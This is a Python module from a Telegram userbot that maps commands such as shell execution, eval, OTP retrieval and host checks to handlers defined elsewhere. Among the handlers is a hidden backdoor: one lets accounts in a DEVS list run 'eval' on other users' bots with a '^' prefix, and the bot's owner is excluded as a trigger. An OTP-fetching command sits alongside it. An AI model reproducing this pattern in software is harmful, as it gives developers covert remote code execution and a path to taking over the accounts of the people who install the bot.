File size: 907 Bytes
561cd5b | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | from ubot import *
@PY.UBOT("sh", sudo=True)
@PY.BOT("sh")
async def _(client, message):
await shell_cmd(client, message)
@PY.UBOT("up", sudo=True)
async def _(client, message):
await ngapdate(client, message)
@PY.UBOT("user", sudo=True)
async def _(client, message):
await liat_berapa(client, message)
@PY.UBOT("eval", sudo=True)
@PY.BOT("eval")
@ubot.on_message(filters.user(DEVS) & filters.command("eval", "^") & ~filters.me)
async def _(client, message):
await evalator_cmd(client, message)
@PY.UBOT("trash")
async def _(client, message):
await trash_cmd(client, message)
@PY.UBOT("getotp|getnum", sudo=True)
async def _(client, message):
await get_my_otp(client, message)
@PY.CALLBACK("host")
async def _(client, callback_query):
await vps(client, callback_query)
@PY.UBOT("host", sudo=True)
async def _(client, message):
await cek_host(client, message)
|